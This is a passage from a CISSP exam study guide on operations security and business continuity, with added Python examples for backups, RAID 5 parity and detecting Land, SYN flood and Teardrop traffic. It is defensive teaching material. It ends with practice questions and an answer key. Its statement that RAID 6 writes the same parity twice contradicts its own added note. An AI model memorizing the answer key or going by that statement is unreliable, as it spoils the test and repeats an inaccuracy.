Scheduling the change
Notifying impacted parties of the change
Implementing the change
Reporting results of the change implementation

All changes must be closely tracked and auditable. A detailed change record should be kept. Some changes can destabilize systems or cause other problems; change management auditing allows operations staff to investigate recent changes in the event of an outage or problem. Audit records also allow auditors to verify that change management policies and procedures have been followed.

CONTINUITY OF OPERATIONS

Continuity of operations is principally concerned with the availability portion of the confidentiality, integrity, and availability triad.

Service-Level Agreements

A Service-Level Agreement (SLA) stipulates all expectations regarding the behavior of the department or organization that is responsible for providing services and the quality of the services provided. Often, Service-Level Agreements will dictate what is considered acceptable regarding things such as bandwidth, time to delivery, response times, etc.

Fault tolerance

In order for systems and solutions within an organization to be able to continually provide operational availability, they must be implemented with fault tolerance in mind. Availability is not solely focused on system uptime requirements but also requires that data be accessible in a timely fashion.

Backup

In order for data to be able to be recovered in case of a fault, some form of backup or redundancy must be provided. Though magnetic tape media is quite an old technology, it is still the most common repository of backup data. The three basic types of backups are: full backup, incremental backup, and differential backup.

Full

The full backup is a replica of all allocated data on a hard disk. Because of the larger amount of media, and therefore cost of media, and the longer backup window requirements, full backups are often coupled with either incremental or differential backups to balance the time and media considerations.

Incremental and differential

Incremental backups only archive files that have changed since the last backup of any kind was performed. Differential backups will archive any files that have been changed since the last full backup.

Did You Know?
Assume a full backup is performed every Sunday, and either incremental or differential backups are performed daily from Monday to Saturday. Data is lost after Wednesday's backup.

If incremental daily backups were used in addition to the weekly full backup, the tapes from Sunday, Monday, Tuesday, and Wednesday would be needed to recover all archived data.
If differential backups were used in addition to the full weekly backup, only the Sunday and Wednesday tapes would be needed.
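The weekly schedule from the Did You Know box, simulated as an added Python example (not code from the book). It runs a full backup on Sunday and either incremental or differential backups on the other days, works out which tapes a restore needs, and then replays those tapes to confirm the Wednesday state comes back. The file names, versions and change history are constructed for the example.

```python
from dataclasses import dataclass
from typing import Dict, List

DAYS = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]


@dataclass
class Backup:
    day: str
    kind: str                  # "full", "incremental" or "differential"
    archived: Dict[str, int]   # file -> version captured on this tape


def run_week(daily_kind: str, changes: Dict[str, Dict[str, int]]) -> List[Backup]:
    """Full backup on Sunday, then `daily_kind` backups Monday to Saturday.

    `changes` maps a day to the files (with their new version) modified that day.
    """
    since_any: Dict[str, int] = {}   # modified since the last backup of any kind
    since_full: Dict[str, int] = {}  # modified since the last full backup
    state: Dict[str, int] = {}       # what is actually on disk
    tapes: List[Backup] = []
    for day in DAYS:
        todays = changes.get(day, {})
        state.update(todays)
        since_any.update(todays)
        since_full.update(todays)
        if day == "Sunday":
            tapes.append(Backup(day, "full", dict(state)))
            since_any, since_full = {}, {}
        elif daily_kind == "incremental":
            tapes.append(Backup(day, "incremental", dict(since_any)))
            since_any = {}
        elif daily_kind == "differential":
            tapes.append(Backup(day, "differential", dict(since_full)))
            since_any = {}
        else:
            raise ValueError(f"unknown backup kind: {daily_kind}")
    return tapes


def tapes_needed(tapes: List[Backup], lost_after: str) -> List[str]:
    """Which tapes must be read to restore the state as of `lost_after`'s backup."""
    upto = tapes[: DAYS.index(lost_after) + 1]
    last_full = max(i for i, t in enumerate(upto) if t.kind == "full")
    later = upto[last_full + 1:]
    needed = [upto[last_full].day]
    if later and later[-1].kind == "differential":
        needed.append(later[-1].day)          # latest differential holds everything since the full
    else:
        needed.extend(t.day for t in later)   # every incremental since the full, in order
    return needed


def restore(tapes: List[Backup], days: List[str]) -> Dict[str, int]:
    """Apply the chosen tapes in order; later versions overwrite earlier ones."""
    by_day = {t.day: t for t in tapes}
    result: Dict[str, int] = {}
    for day in days:
        result.update(by_day[day].archived)
    return result


# Constructed change history: which files changed on which day (file -> version).
CHANGES = {
    "Sunday": {"payroll.db": 1, "config.ini": 1, "notes.txt": 1},
    "Monday": {"payroll.db": 2},
    "Tuesday": {"config.ini": 2},
    "Wednesday": {"payroll.db": 3, "report.pdf": 1},
}
EXPECTED_WEDNESDAY = {"payroll.db": 3, "config.ini": 2, "notes.txt": 1, "report.pdf": 1}

if __name__ == "__main__":
    for kind in ("incremental", "differential"):
        tapes = run_week(kind, CHANGES)
        days = tapes_needed(tapes, "Wednesday")
        print(kind, days, restore(tapes, days) == EXPECTED_WEDNESDAY)
```

The trade-off the text describes is visible in the archived dictionaries: the differential tapes grow through the week (Wednesday's holds payroll.db, config.ini and report.pdf) while each incremental tape stays small, at the cost of needing every tape in the chain at restore time.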

Redundant Array of Inexpensive Disks

Even if only one full backup tape is needed for recovery of a system due to a hard disk failure, the time to recover a large amount of data can easily exceed the recovery time dictated by the organization. The goal of a Redundant Array of Inexpensive Disks (RAID) is to help mitigate the risk associated with hard disk failures. There are various RAID levels that consist of different approaches to disk array configurations.

Fast Facts
Three critical RAID terms are: mirroring, striping, and parity.
Mirroring achieves full data redundancy by writing the same data to multiple hard disks.
Striping focuses on increasing read and write performance by spreading data across multiple hard disks. Writes can be performed in parallel across multiple disks rather than serially on one disk. This parallelization provides a performance increase and does not aid in data redundancy.
Parity achieves data redundancy without incurring the same degree of cost as that of mirroring in terms of disk usage and write performance.

RAID 0: Striped set

RAID 0 employs striping to increase the performance of reads and writes. Striping offers no data redundancy, so RAID 0 is a poor choice if recovery of data is critical. Figure 7.1 shows RAID 0.

FIGURE 7.1 RAID 0: striped set.

RAID 1: Mirrored set

RAID 1 creates/writes an exact duplicate of all data to an additional disk. The write performance is decreased, though the read performance can see an increase. Figure 7.2 shows RAID 1.

FIGURE 7.2 RAID 1: mirrored set.

RAID 2: Hamming code

RAID 2 is a legacy technology that requires either 14 or 39 hard disks and a specially designed hardware controller, which makes RAID 2 cost prohibitive. RAID 2 stripes at the bit level.

Exam Warning
While the ability to quickly recover from a disk failure is a goal of RAID, there are configurations that do not have reliability as a capability. For the exam, understand that not all RAID configurations provide additional reliability.

RAID 3: Striped set with dedicated parity (byte level)

Striping is desirable due to the performance gains associated with spreading data across multiple disks. However, striping alone is not as desirable due to the lack of redundancy. With RAID 3, data, at the byte level, is striped across multiple disks, but an additional disk is leveraged for storage of parity information, which is used for recovery in the event of a failure.

RAID 4: Striped set with dedicated parity (block level)

RAID 4 provides the same functionality as RAID 3 but stripes data at the block, rather than byte, level. Like RAID 3, RAID 4 employs a dedicated parity drive rather than having parity data distributed among all disks, as in RAID 5.

RAID 5: Striped set with distributed parity

One of the most popular RAID configurations is that of RAID 5, striped set with distributed parity. Like RAIDs 3 and 4, RAID 5 writes parity information that is used for recovery purposes. RAID 5 writes at the block level, like RAID 4. However, unlike RAIDs 3 and 4, which require a dedicated disk for parity information, RAID 5 distributes the parity information across multiple disks. One of the reasons for RAID 5's popularity is that the disk cost for redundancy is lower than that of a mirrored set. RAID 5 allows for data recovery in the event that any one disk fails. Figure 7.3 shows RAID 5.

FIGURE 7.3 RAID 5: striped set with distributed parity.

RAID 6: Striped set with dual distributed parity

While RAID 5 accommodates the loss of any one drive in the array, RAID 6 can allow for the failure of two drives and still function. This redundancy is achieved by writing the same parity information to two different disks.

RAID 1+0 or RAID 10

RAID 1+0 or RAID 10 is an example of what is known as nested RAID or multi-RAID, which simply means that one standard RAID level is encapsulated within another. With RAID 10, which is also commonly written as RAID 1+0 to explicitly indicate the nesting, the configuration is that of a striped set of mirrors.

Crunch Time
Table 7.1 provides a brief description of the various RAID levels that are most commonly used.

Table 7.1 RAID Levels

RAID Level   Description
RAID 0       Block-level striped set
RAID 1       Mirrored set
RAID 3       Byte-level striping with dedicated parity
RAID 4       Block-level striping with dedicated parity
RAID 5       Block-level striping with distributed parity
RAID 6       Block-level striping with dual distributed parity
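How block-level striping with distributed parity actually recovers from a failed disk, as an added Python example (not code from the book, and not how any real controller is implemented). The parity block of each stripe is the XOR of that stripe's data blocks and its position rotates across the disks; XOR-ing the surviving blocks of a stripe gives back whichever block was lost, data or parity alike, which is why RAID 5 survives exactly one failure. The disk count, block size and sample data are constructed for the example. RAID 6 is not shown: its second parity block is computed independently of the first and needs Galois-field arithmetic rather than plain XOR.

```python
from functools import reduce
from typing import List, Optional

Block = bytes
Disk = List[Block]


def xor_blocks(blocks: List[Block]) -> Block:
    """Bitwise XOR of equal-length blocks; this is the parity function."""
    return bytes(reduce(lambda a, b: a ^ b, col) for col in zip(*blocks))


def parity_disk_for(stripe: int, n_disks: int) -> int:
    """Rotate the parity block across disks so no single disk holds all parity (RAID 5, not RAID 4)."""
    return (n_disks - 1 - stripe) % n_disks


def raid5_write(data: bytes, n_disks: int, block_size: int) -> List[Disk]:
    """Split data into stripes of n_disks-1 data blocks plus one parity block each."""
    if n_disks < 3:
        raise ValueError("RAID 5 needs at least three disks")
    per_stripe = block_size * (n_disks - 1)
    padded = data + b"\x00" * ((-len(data)) % per_stripe)   # pad the last stripe
    disks: List[Disk] = [[] for _ in range(n_disks)]
    for s in range(len(padded) // per_stripe):
        chunk = padded[s * per_stripe:(s + 1) * per_stripe]
        data_blocks = [chunk[i * block_size:(i + 1) * block_size] for i in range(n_disks - 1)]
        parity = xor_blocks(data_blocks)
        p = parity_disk_for(s, n_disks)
        remaining = iter(data_blocks)
        for d in range(n_disks):
            disks[d].append(parity if d == p else next(remaining))
    return disks


def raid5_read(disks: List[Disk], length: int) -> bytes:
    """Reassemble the data by skipping each stripe's parity block."""
    n = len(disks)
    out = bytearray()
    for s in range(len(disks[0])):
        p = parity_disk_for(s, n)
        for d in range(n):
            if d != p:
                out += disks[d][s]
    return bytes(out[:length])


def can_rebuild(disks: List[Optional[Disk]]) -> bool:
    """Single parity tolerates exactly one missing disk (None)."""
    return sum(1 for d in disks if d is None) == 1


def raid5_rebuild(disks: List[Optional[Disk]]) -> List[Disk]:
    """Reconstruct the one failed disk by XOR of the survivors, stripe by stripe."""
    if not can_rebuild(disks):
        raise ValueError("RAID 5 can rebuild exactly one failed disk")
    failed = disks.index(None)
    survivors = [d for d in disks if d is not None]
    rebuilt = [xor_blocks([d[s] for d in survivors]) for s in range(len(survivors[0]))]
    result = list(disks)
    result[failed] = rebuilt
    return result  # type: ignore[return-value]


# Constructed sample: 50 bytes over four disks with 8-byte blocks (three stripes).
DATA = b"RAID 5 distributes parity so any one disk can fail"

if __name__ == "__main__":
    array = raid5_write(DATA, n_disks=4, block_size=8)
    degraded = list(array)
    degraded[2] = None                     # simulate losing disk 2
    print(raid5_read(raid5_rebuild(degraded), len(DATA)) == DATA)
```

Because any one block of a stripe is the XOR of the others, a rebuild reads every surviving disk in full, which is the window during which a second failure is unrecoverable with single parity.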

System redundancy

Though redundancy and resiliency of data, provided by RAID and backup solutions, are important, further consideration needs to be given to the systems themselves that provide access to this redundant data.

Redundant hardware and redundant systems

Many systems can provide internal hardware redundancy of components that are extremely prone to failure. The most common example of this built-in redundancy is systems or devices that have redundant onboard power in the event of a power supply failure. Sometimes, systems simply have field-replaceable modular versions of commonly failing components. Though physically replacing a power supply might increase downtime, having an inventory of spare modules to service the entire data center's servers would be less expensive than having all servers configured with an installed redundant power supply.

Redundant systems (aka alternative systems) make entire systems available in case of failure of the primary system.

High-availability clusters

A high-availability cluster (also called a failover cluster) uses multiple systems that are already installed, configured, and plugged in, such that if a failure causes one of the systems to fail then the other can be seamlessly leveraged to maintain the availability of the service or application being provided.

Each member of an active-active HA cluster actively processes data in advance of a failure. This is commonly referred to as load balancing. Having systems in an active-active, or load balancing, configuration is typically more costly than having the systems in an active-passive, or hot standby, configuration in which the backup systems only begin processing when a failure is detected.

INCIDENT RESPONSE MANAGEMENT

A security incident is a harmful occurrence on a system or network. All organizations will experience security incidents. Incident response management is a regimented and tested methodology for identifying and responding to these incidents.

A Computer Security Incident Response Team (CSIRT) is the group tasked with monitoring, identifying, and responding to security incidents. The goal of the incident response plan is to allow the organization to control the cost and damage associated with incidents and to make the recovery of impacted systems quicker.

Methodology

Figure 7.4 is from the NIST Special Publication 800-61: Computer Security Incident Handling Guide (see http://csrc.nist.gov/publications/nistpubs/800-61rev2/SP800-61rev2.pdf), which outlines the incident response life cycle in four steps:
1. Preparation
2. Detection and analysis
3. Containment, eradication, and recovery
4. Post-incident activity

FIGURE 7.4 NIST Incident Response Life Cycle.

Many incident handling methodologies treat containment, eradication, and recovery as three distinct steps, as we will in this book. Other names for each step are sometimes used; here is the six-step life cycle we will follow, with alternate names listed:
1. Preparation
2. Detection and analysis (aka identification)
3. Containment
4. Eradication
5. Recovery
6. Lessons learned (aka post-incident activity, postmortem, or reporting)

It is important to remember that the final step feeds back into the first step, as shown previously in Figure 7.4. An organization may determine during the lessons learned phase that staff were insufficiently trained to handle incidents. That lesson is then applied to continued preparation, where staff would be properly trained.

Preparation

The preparation phase includes steps taken before an incident occurs. These include training, writing incident response policies and procedures, and providing tools such as laptops with sniffing software, crossover cables, original OS media, removable drives, etc. Preparation should include anything that may be required to handle an incident or that will make incident response faster and more effective.

Detection and analysis

Detection (also called identification) is the phase where events are analyzed in order to determine whether they comprise a security incident. An event is any auditable action on a system or network (such as a server reboot or a user logging in to check email). An incident is a harmful event (such as a denial of service attack that crashes a server).

Containment

The containment phase is the point at which the incident response team attempts to keep further damage from occurring as a result of the incident. Containment might include taking a system off the network, isolating traffic, powering off the system, or other items to control both the scope and severity of the incident. This phase is also typically where a binary (bit-by-bit) forensic backup is made of systems involved in the incident.

Eradication

The eradication phase involves two steps: removing any malicious software from a compromised system and understanding the cause of the incident so that the system can be reliably cleaned and safely restored to operational status later in the recovery phase. In order for an organization to reliably recover from an incident, the cause must be determined so that the systems in question can be returned to a known good state without risk of compromise persisting or reoccurring.

Recovery

The recovery phase involves cautiously restoring the system or systems to operational status. Typically, the business unit responsible for the system will dictate when the system will go back online. Consider the possibility that the infection might have persisted through the eradication phase. For this reason, close monitoring of the system after it is returned to production is necessary.

Lessons learned

Unfortunately, the lessons learned phase (also known as post-incident activity, reporting, or postmortem) is likely to be neglected in immature incident response programs. This is unfortunate because the lessons learned phase, if done right, is the phase that has the greatest potential to effect a positive change in security posture. The goal of the lessons learned phase is to provide a final report on the incident, which will be delivered to management.

Feedback from this phase feeds directly into continued preparation, where the lessons learned are applied to improve preparation for handling future incidents.
Types of attacks

This section will provide basic information on the types of attacks more commonly experienced and responded to in organizations.

Session hijacking and MITM

Session hijacking compromises an existing network session, sometimes seizing control of it. Older protocols such as Telnet may be vulnerable to session hijacking.

A Man-in-the-Middle (MITM, also called Monkey-in-the-Middle) attack places the attacker between the victim and another system: the attacker's goal is to be able to serve as an undiscovered proxy for either or both of two endpoints engaging in communication. Encrypted communications that provide mutual endpoint authentication can mitigate both session hijacking and MITM.

Malware

Malware, or malicious code/software, represents one of the best-known types of threats to information systems. There are numerous types of malware, some detailed in Table 7.2, that have evolved over the years to continually cause stress to operations.

Table 7.2 Types of Malware

Malicious Code   Description
Virus            A virus is malware that does not self-propagate: it requires a carrier, such as a human manually moving an infected USB device from one system to another
Macro virus      A macro virus is malware that infects Microsoft Office documents by means of embedding malicious macros within them
Worm             A worm is malware that self-propagates. Some of the most well-known names of malware fall under the worm category: Code Red, Nimda, SQL Slammer, Blaster, MyDoom, and Witty
Trojan Horse     A Trojan Horse is malware that has two functions: one overt (such as a game) and one covert (such as providing an attacker with persistent backdoor access)
Rootkit          A rootkit is malware that violates system integrity and is focused on hiding from system administrators. Typical capabilities include file, folder, process, and network connection hiding

Denial of Service and Distributed Denial of Service

Denial of Service (DoS) is a one-to-one availability attack; Distributed Denial of Service (DDoS) is a many-to-one availability attack. DoS attacks come in all shapes and sizes, ranging from those involving one specially crafted packet and a vulnerable system to see that packet, to DDoS attacks that leverage tens of thousands (or more) of bots to target an online service provider with a flood of seemingly legitimate traffic attempting to overwhelm their capacity.

Table 7.3 includes historical examples of malicious packet attacks as well as some general resource exhaustion, or flooding, techniques.

Table 7.3 Denial of Service Examples

DoS Name        Type                  Description
Land            Malformed packet      The Land attack uses a spoofed SYN packet that includes the victim's IP address as both source and destination
Smurf           Resource exhaustion   A Smurf attack involves ICMP flooding. The attacker sends ICMP Echo Request messages with spoofed source addresses of the victim to the directed broadcast address of a network known to be a Smurf amplifier. A Smurf amplifier is a public-facing network that sends a large number of responses from traffic sent to directed broadcast addresses
SYN Flood       Resource exhaustion   A SYN Flood sends many TCP packets with the SYN flag set to a victim and ignores the victim's SYN/ACK packets. The victim's half-open connection queue may eventually fill and be unable to process new connections
Teardrop        Malformed packet      The Teardrop attack sends packets with overlapping fragment offsets, which may crash the system that is attempting to reassemble the fragments
Ping of Death   Malformed packet      The Ping of Death sends fragmented ICMP Echo Requests that, once reassembled, are larger than the maximum size of an IP packet
Fraggle         Resource exhaustion   The Fraggle attack is a variation of the Smurf attack. While Smurf uses ICMP, Fraggle uses UDP
DNS reflection                        A DNS reflection attack sends high numbers of DNS requests spoofed from the victim to publicly accessible recursive DNS name servers
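Detection logic for three of the Table 7.3 patterns, run over constructed packet summaries, as an added Python example (not code from the book and not a real capture). Each detector keys on the property the table names: a Land packet is a SYN whose source equals its destination; a SYN flood shows as many half-open connections (SYNs never followed by the client's ACK) toward one destination; a Teardrop datagram has fragment offsets that overlap. The Packet record, the addresses and the threshold are assumptions made for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Packet:
    """Header fields a sensor might export (constructed records, not real captures)."""
    ts: float
    src: str
    dst: str
    proto: str             # "TCP" or "ICMP"
    flags: str = ""        # TCP flags as letters, e.g. "S", "SA", "A"
    ip_id: int = 0         # IP identification, shared by fragments of one datagram
    frag_offset: int = 0   # fragment offset in bytes
    frag_len: int = 0      # 0 means the packet is not fragmented


def find_land_packets(pkts: List[Packet]) -> List[Packet]:
    """Land: a SYN whose source address equals its destination address."""
    return [p for p in pkts if p.proto == "TCP" and "S" in p.flags and p.src == p.dst]


def half_open_counts(pkts: List[Packet]) -> Dict[str, int]:
    """Per destination, how many client SYNs were never completed by that client's ACK."""
    pending: Dict[Tuple[str, str], int] = defaultdict(int)
    for p in sorted(pkts, key=lambda p: p.ts):
        if p.proto != "TCP":
            continue
        if p.flags == "S":
            pending[(p.src, p.dst)] += 1
        elif p.flags == "A" and pending.get((p.src, p.dst)):
            pending[(p.src, p.dst)] -= 1          # third step of the handshake arrived
    counts: Dict[str, int] = defaultdict(int)
    for (_, dst), n in pending.items():
        counts[dst] += n
    return dict(counts)


def syn_flood_victims(pkts: List[Packet], threshold: int = 50) -> List[str]:
    """Destinations whose half-open backlog reaches the threshold (assumed value)."""
    return sorted(dst for dst, n in half_open_counts(pkts).items() if n >= threshold)


def overlapping_fragment_groups(pkts: List[Packet]) -> List[Tuple[str, str, int]]:
    """Teardrop: fragments of one datagram whose offset falls inside the previous fragment."""
    groups: Dict[Tuple[str, str, int], List[Packet]] = defaultdict(list)
    for p in pkts:
        if p.frag_len:
            groups[(p.src, p.dst, p.ip_id)].append(p)
    bad = []
    for key, frags in groups.items():
        end = 0
        for f in sorted(frags, key=lambda f: f.frag_offset):
            if f.frag_offset < end:
                bad.append(key)
                break
            end = f.frag_offset + f.frag_len
    return bad


def sample_traffic() -> List[Packet]:
    """Constructed: one normal handshake, one Land packet, 60 unanswered SYNs, two fragment sets."""
    pkts = [
        Packet(0.00, "10.0.0.5", "10.0.0.1", "TCP", flags="S"),
        Packet(0.01, "10.0.0.1", "10.0.0.5", "TCP", flags="SA"),
        Packet(0.02, "10.0.0.5", "10.0.0.1", "TCP", flags="A"),
        Packet(0.50, "10.0.0.1", "10.0.0.1", "TCP", flags="S"),          # Land: src == dst
    ]
    pkts += [Packet(1.0 + i / 1000, f"198.51.100.{i}", "10.0.0.2", "TCP", flags="S")
             for i in range(1, 61)]                                       # half-open backlog
    pkts += [
        Packet(2.0, "192.0.2.7", "10.0.0.3", "ICMP", ip_id=7, frag_offset=0, frag_len=24),
        Packet(2.0, "192.0.2.7", "10.0.0.3", "ICMP", ip_id=7, frag_offset=16, frag_len=24),  # overlap
        Packet(2.1, "192.0.2.8", "10.0.0.3", "ICMP", ip_id=8, frag_offset=0, frag_len=24),
        Packet(2.1, "192.0.2.8", "10.0.0.3", "ICMP", ip_id=8, frag_offset=24, frag_len=24),  # clean
    ]
    return pkts


if __name__ == "__main__":
    t = sample_traffic()
    print(len(find_land_packets(t)), syn_flood_victims(t), overlapping_fragment_groups(t))
```

The half-open counter ignores the server's SYN/ACK on purpose: what distinguishes a flood from a busy server is that the client side never sends the final ACK, so the count only goes down when that packet is seen.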

Summary of exam objectives

In this chapter, we have discussed operations security. Operations security concerns the security of systems and data while being actively used in a production environment. Ultimately, operations security is about people, data, media, and hardware; all of which are elements that need to be considered from a security perspective. The best technical security infrastructure in the world will be rendered moot if an individual with privileged access decides to turn against the organization and there are no preventive or detective controls in place within the organization.

TOP FIVE TOUGHEST QUESTIONS

1. What is the best way to destroy electronic data?
A. Degaussing
B. Bit-level overwrite
C. Destruction
D. Formatting
2. Which level of RAID stripes data across multiple disks at the byte level?
A. RAID 2
B. RAID 3
C. RAID 4
D. RAID 5
3. Which principle involves defining a trusted security baseline image of critical systems?
A. Configuration management
B. Change management
C. Patch management
D. Vulnerability management
4. Which type of attack leverages overlapping fragments to cause a Denial of Service?
A. Smurf
B. Teardrop
C. Fraggle
D. Ping of Death
5. Which of the following can be either a detective or deterrent control?
A. Separation of duties
B. Principle of least privilege
C. Rotation of duties
D. Collusion

ANSWERS
1. Correct answer and explanation: C. Answer C is correct; destruction is the most secure way to destroy data: it offers physical and visual evidence of successful completion.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. Degaussing and bit-level overwrites may be adequate when performed successfully against magnetic media but offer no visual proof of successful completion. This means undetected errors may result in risk. Formatting is incorrect because it usually replaces the File Allocation Table (FAT) with a new version but usually leaves unallocated data as is.
2. Correct answer and explanation: B. Answer B is correct; RAID 3 stripes data across multiple disks at the byte level.
Incorrect answers and explanations: A, C, and D. Answers A, C, and D are incorrect. RAID 2 stripes at the bit level. Both RAID 4 and RAID 5 stripe at the block level.
3. Correct answer and explanation: A. Answer A is correct; configuration management involves the creation of a known security baseline for systems and is often built leveraging third-party security configuration guides.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. Change management is concerned with ensuring a regimented process is followed for any changes made to systems. Patch management ensures that systems receive timely updates to installed software. Vulnerability management's purpose is to come to understand what known vulnerabilities exist in an organization and track their remediation over time.
4. Correct answer and explanation: B. Answer B is correct; the Teardrop attack is a DoS that works by sending overlapping fragments that, when received by a vulnerable host, can cause a system to crash.
Incorrect answers and explanations: A, C, and D. Answers A, C, and D are incorrect. Smurf attacks send spoofed ICMP Echo Requests to publicly accessible directed broadcast addresses. Fraggle is similar to Smurf but uses UDP instead of ICMP. The Ping of Death also uses fragments, but they do not overlap.
5. Correct answer and explanation: C. Answer C is correct; rotation of duties can serve as either a detective or deterrent control: the fear of being caught may deter someone from committing fraud; the rotation may detect fraud that has already occurred.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. Separation of duties and the principle of least privilege are primarily preventive controls. Collusion is not a control.

NIST Special Publication 800-61: Computer Security Incident Handling Guide. http://csrc.nist.gov/publications/nistpubs/800-61rev2/SP800-61rev2.pdf [accessed May 5, 2013].

Executive Order 12356 National security information. http://www.archives.gov/federal-register/codification/executive-order/12356.html [accessed May 5, 2013].

CHAPTER 8

Domain 8: Business Continuity and Disaster Recovery Planning

Abstract
This chapter focuses on Domain 8: Business Continuity and Disaster Recovery Planning. A thorough understanding of both Business Continuity Planning (BCP) and Disaster Recovery Planning (DRP) is required in order to be successful with questions from this domain. A key goal is to understand the differences in the scope and purpose of the BCP and DRP. DRP represents a more tactical, information systems-focused exercise, while the BCP, which includes DRP as one of its components, is considerably more vast and high level. Key concepts for this domain include that of performing a Business Impact Analysis (BIA) and determining a system's Maximum Tolerable Downtime (MTD).

KEYWORDS
Business Continuity Plan (BCP); Continuity of Operations Plan (COOP); Disaster; Disaster Recovery Plan (DRP); Mean Time Between Failures (MTBF); Mean Time to Repair (MTTR); Recovery Point Objective (RPO); Recovery Time Objective (RTO); Work Recovery Time (WRT); Minimum Operating Requirements (MOR)

Exam Objectives in This Chapter

BCP and DRP Overview and Process
Developing a BCP/DRP
DRP Testing and Training
Continued BCP/DRP Maintenance
Specific BCP/DRP Frameworks

Introduction
Business Continuity and Disaster Recovery Planning is an organization's last line of defense: when all other controls have failed, BCP/DRP is the final control that may prevent drastic events such as injury, loss of life, or failure of an organization. As information security professionals, we must be vigilant and protect our organizations and staff from these disruptive events.

BCP AND DRP OVERVIEW AND PROCESS

The terms and concepts associated with Business Continuity and Disaster Recovery Planning are often misunderstood. Clear understanding of what is meant by both Business Continuity and Disaster Recovery Planning, as well as what they entail, is critical for the CISSP candidate.

Business Continuity Planning

Though many organizations will simply use the phrases Business Continuity Planning (BCP) and Disaster Recovery Planning interchangeably, they are two distinct disciplines. The overarching goal of a BCP is ensuring that the business will continue to operate before, throughout, and after a disaster event is experienced. The focus of a BCP is on the business as a whole and ensuring that those critical services that the business provides or critical functions that the business regularly performs can still be carried out both in the wake of a disruption and after the disruption has been weathered.

Disaster Recovery Planning

The Disaster Recovery Plan (DRP) provides a short-term plan for dealing with specific IT-oriented disruptions. Mitigating a malware infection that shows risk of spreading to other systems is an example of a specific IT-oriented disruption that a DRP would address. The DRP focuses on efficiently attempting to mitigate the impact of a disaster and the immediate response and recovery of critical IT systems in the face of a significant disruptive event. Disaster Recovery Planning is considered tactical rather than strategic and provides a means for immediate response to disasters.

Relationship between BCP and DRP

The Business Continuity Plan is an umbrella plan that includes multiple specific plans, most importantly the Disaster Recovery Plan. The Disaster Recovery Plan serves as a subset of the overall Business Continuity Plan, because a BCP would be doomed to fail if it did not contain a tactical method for immediately dealing with disruption of information systems. Figure 8.1, from NIST Special Publication 800-34, provides a visual means for understanding the interrelatedness of a BCP and a DRP, as well as Continuity of Operations Plan (COOP), Occupant Emergency Plan (OEP), and others.

FIGURE 8.1 BCP and related plans.

Disasters or disruptive events

Given that organizations' Business Continuity and Disaster Recovery Plans are created because of the potential of disasters impacting operations, understanding disasters and disruptive events is necessary.

Fast Facts
The three common ways of categorizing the causes for disasters are whether the threat agent is natural, human, or environmental in nature.
Natural: The most obvious type of threat that can result in a disaster is naturally occurring. This category includes threats such as earthquakes, hurricanes, tornadoes, floods, and some types of fires. Historically, natural disasters have provided some of the most devastating disasters that an organization can have to respond to.
Human: The human category of threats represents the most common source of disasters. Human threats can be further classified by whether they constitute an intentional or unintentional threat.
Environmental: Threats focused on information systems or data center environments include items such as power issues (blackout, brownout, surge, spike), system component or other equipment failures, and application or software flaws.

The analysis of threats and determination of the associated likelihood of the threats being manifested are an important part of the BCP and DRP process. Table 8.1 provides a quick summary of some of the disaster events and what type of disaster they constitute.

Fast Facts
Types of disruptive events include:
Errors and omissions: typically considered the most common source of disruptive events. This type of threat is caused by humans who unintentionally serve as a source of harm.
Natural disasters: include earthquakes, hurricanes, floods, tsunamis, etc.
Electrical or power problems: loss of power may cause availability issues and integrity issues due to corrupted data.
Temperature and humidity failures: may damage equipment due to overheating, corrosion, or static electricity.
Warfare, terrorism, and sabotage: threat can vary dramatically based on geographic location, industry, brand value, and the interrelatedness with other high-value target organizations.
Financially motivated attackers: attackers who seek to make money by attacking victim organizations; examples include exfiltration of cardholder data, identity theft, pump-and-dump stock schemes, bogus antimalware tools, corporate espionage, and others.
Personnel shortages: may be caused by strikes, pandemics, or transportation issues. A lack of staff may lead to operational disruption.

Table 8.1 Examples of Disruptive Events

Disruptive Event                    Type
Earthquake/tornado/hurricane/etc.   Natural
Strike                              Human (intentional)
Cyberterrorism                      Human (intentional)/technical
Malware                             Human (intentional)/technical
Denial of Service                   Human (intentional)/technical
Errors and omissions                Human (unintentional)
Electrical fire                     Environmental
Equipment failure                   Environmental

The Disaster Recovery Process

Having discussed the importance of Business Continuity and Disaster Recovery Planning and examples of threats that justify this degree of planning, we will now focus on the fundamental steps involved in recovering from a disaster.

Respond

In order to begin the disaster recovery process, there must be an initial response that begins the process of assessing the damage. Speed is essential during this initial assessment. The initial assessment will determine if the event in question constitutes a disaster.

Activate team

If a disaster is declared, then the recovery team needs to be activated. Depending on the scope of the disaster, this communication could prove extremely difficult. The use of calling trees, which will be discussed in Section Call Trees in this chapter, can help to facilitate this process to ensure that members can be activated as smoothly as possible.

Communicate

One of the most difficult aspects of disaster recovery is ensuring that consistent, timely status updates are communicated back to the central team managing the response and recovery process. This communication often must occur out of band, meaning that the typical communication method of leveraging an office phone will quite often not be a viable option. In addition to communication of internal status regarding the recovery activities, the organization must be prepared to provide external communications, which involve disseminating details regarding the organization's recovery status with the public.

Assess

Though an initial assessment was carried out during the initial response portion of the disaster recovery process, a more detailed and thorough assessment will be performed by the disaster recovery team. The team will proceed to assessing the extent of the damage to determine the proper steps necessary to ensure the organization's ability to meet its mission.

Reconstitution

The primary goal of the reconstitution phase is to successfully recover critical business operations at either the primary or a secondary site. If an alternate site is leveraged, adequate safety and security controls must be in place in order to maintain the expected degree of security the organization typically employs. The use of an alternate computing facility for recovery should not expose the organization to further security incidents. In addition to the recovery team's efforts at reconstitution of critical business functions at an alternate location, a salvage team will be employed to begin the recovery process at the primary facility that experienced the disaster. Ultimately, the expectation is, unless wholly unwarranted given the circumstances, that the primary site will be recovered and that the alternate facility's operations will fail back or be transferred again to the primary center of operations.

DEVELOPING A BCP/DRP

Developing a BCP/DRP is vital for an organization's ability to respond and recover from an interruption in normal business functions or a catastrophic event. In order to ensure that all planning has been considered, the BCP/DRP has a specific set of requirements to review and implement. Below are listed these high-level steps, according to NIST 800-34, to achieving a sound, logical BCP/DRP. NIST 800-34 is the National Institute of Standards and Technology's Information Technology Contingency Planning Guide.
Project Initiation
Scope the Project
Business Impact Analysis
Identify Preventive Controls
Recovery Strategy
Plan Design and Development
Implementation, Training, and Testing
BCP/DRP Maintenance

